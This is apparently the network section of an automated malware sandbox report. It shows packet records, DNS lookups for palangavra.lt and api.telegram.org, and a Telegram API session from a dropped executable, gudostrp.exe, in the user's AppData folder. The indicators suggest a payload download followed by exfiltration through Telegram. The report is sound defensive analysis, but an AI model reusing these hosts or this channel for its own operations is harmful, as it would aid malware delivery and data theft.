                                                                                Oct 14, 2021 10:22:59.171413898 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171437979 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171446085 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171466112 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171475887 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171494007 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171515942 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.171533108 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.171549082 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.172338009 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.172405958 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.172446012 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.172460079 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.172481060 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.172494888 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.172521114 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.172533989 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.172558069 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.172576904 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.172610044 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.172617912 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.172663927 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.174755096 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193406105 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193459034 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193499088 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193523884 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193540096 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193546057 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193578959 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193592072 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193615913 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193627119 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193646908 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193669081 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193689108 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193706036 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193725109 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193746090 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193767071 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193783045 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193797112 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193819046 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193839073 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193856955 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193876028 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193895102 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.193917990 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193941116 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.193943024 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194001913 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194308043 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194350004 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194370985 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194386959 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194399118 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194433928 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194441080 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194475889 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194493055 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194514036 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194526911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194554090 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194574118 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194591045 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194605112 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194627047 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194631100 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194664001 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194679976 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194701910 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194721937 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194749117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194756031 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194789886 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194802999 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194843054 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194884062 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194921017 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.194973946 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.194993973 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.195059061 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.195092916 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.195147991 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.195249081 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.195311069 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196582079 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196624041 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196656942 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196660042 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196671963 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196698904 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196718931 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196736097 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196760893 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196783066 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196795940 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196824074 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196837902 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196861029 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196867943 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196899891 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196923018 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196937084 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196958065 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.196973085 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.196974039 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.197010994 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.197027922 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.197047949 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.197066069 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.197128057 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.197134018 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.197168112 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.197180986 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.197205067 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.197226048 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.197263002 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.215791941 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.215843916 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.215893984 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.215899944 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.215934038 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.215935946 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221298933 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221302032 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221328020 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221354961 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221368074 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221379995 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221385002 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221388102 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221414089 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221434116 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221450090 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221450090 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221482992 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221497059 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221513033 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221525908 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221543074 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221554041 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221571922 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221584082 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221600056 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221613884 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221631050 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221641064 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221659899 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221673012 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221697092 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221698999 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221728086 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221735954 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221756935 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221769094 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221786976 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221797943 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221816063 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221826077 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221858978 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243601084 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243654966 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243691921 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243710995 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243732929 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243741035 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243746996 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243769884 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243789911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243817091 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243835926 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243859053 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243865967 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243896008 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243910074 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243935108 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243940115 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243972063 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243984938 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244009018 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244021893 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244046926 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244055033 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244085073 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244098902 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244131088 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244134903 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244216919 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244221926 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244252920 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244261026 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244296074 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244299889 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244339943 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244347095 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244376898 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244385958 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244415045 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244421959 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244452000 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244458914 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244488001 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244502068 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244528055 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244530916 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244575024 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244905949 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244954109 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244970083 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244995117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244998932 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245033979 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245071888 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245095968 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245110035 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245127916 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245136976 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245146036 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245153904 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245182991 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245198011 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245220900 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245235920 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245261908 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245266914 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245309114 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245313883 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245345116 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245354891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245383024 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245388985 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245419979 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245429039 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245455027 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245476007 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245492935 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245497942 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245531082 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245546103 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245578051 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245590925 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245619059 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245629072 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245656013 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245672941 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245693922 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245697021 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245731115 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245740891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245767117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245781898 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245807886 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245853901 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245903015 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245910883 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245978117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245979071 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246028900 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246093035 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246141911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246202946 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246253967 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246289015 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246325970 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246339083 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246371984 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246390104 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246414900 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246432066 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246453047 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246479988 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246500969 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246520996 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246530056 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246553898 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246582031 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246753931 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.247596025 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:23:04.194571972 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:23:04.194775105 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:23:27.091092110 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:24:56.311146975 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.311184883 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.311368942 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.323960066 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.323987007 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.392973900 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.393135071 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.410365105 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.410413980 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.410795927 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.615189075 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.618835926 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.786638975 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.813334942 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.817281008 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.859139919 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.915749073 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.915889978 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.915997982 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.917042971 CEST49169443192.168.2.22149.154.167.220

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 14, 2021 10:22:58.987952948 CEST5216753192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:22:59.023015022 CEST53521678.8.8.8192.168.2.22
                                                                                Oct 14, 2021 10:24:56.252165079 CEST5059153192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:24:56.270032883 CEST53505918.8.8.8192.168.2.22
                                                                                Oct 14, 2021 10:24:56.270914078 CEST5059153192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:24:56.289134979 CEST53505918.8.8.8192.168.2.22

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Oct 14, 2021 10:22:58.987952948 CEST192.168.2.228.8.8.80x8ff9Standard query (0)palangavra.ltA (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.252165079 CEST192.168.2.228.8.8.80x3162Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.270914078 CEST192.168.2.228.8.8.80x3162Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Oct 14, 2021 10:22:59.023015022 CEST8.8.8.8192.168.2.220x8ff9No error (0)palangavra.lt144.76.47.167A (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.270032883 CEST8.8.8.8192.168.2.220x3162No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.289134979 CEST8.8.8.8192.168.2.220x3162No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • api.telegram.org
                                                                                • palangavra.lt

                                                                                HTTP Packets

                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                 0 | 192.168.2.22 | 49169 | 149.154.167.220 | 443 | C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                 Timestamp | kBytes transferred | Direction | Data


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
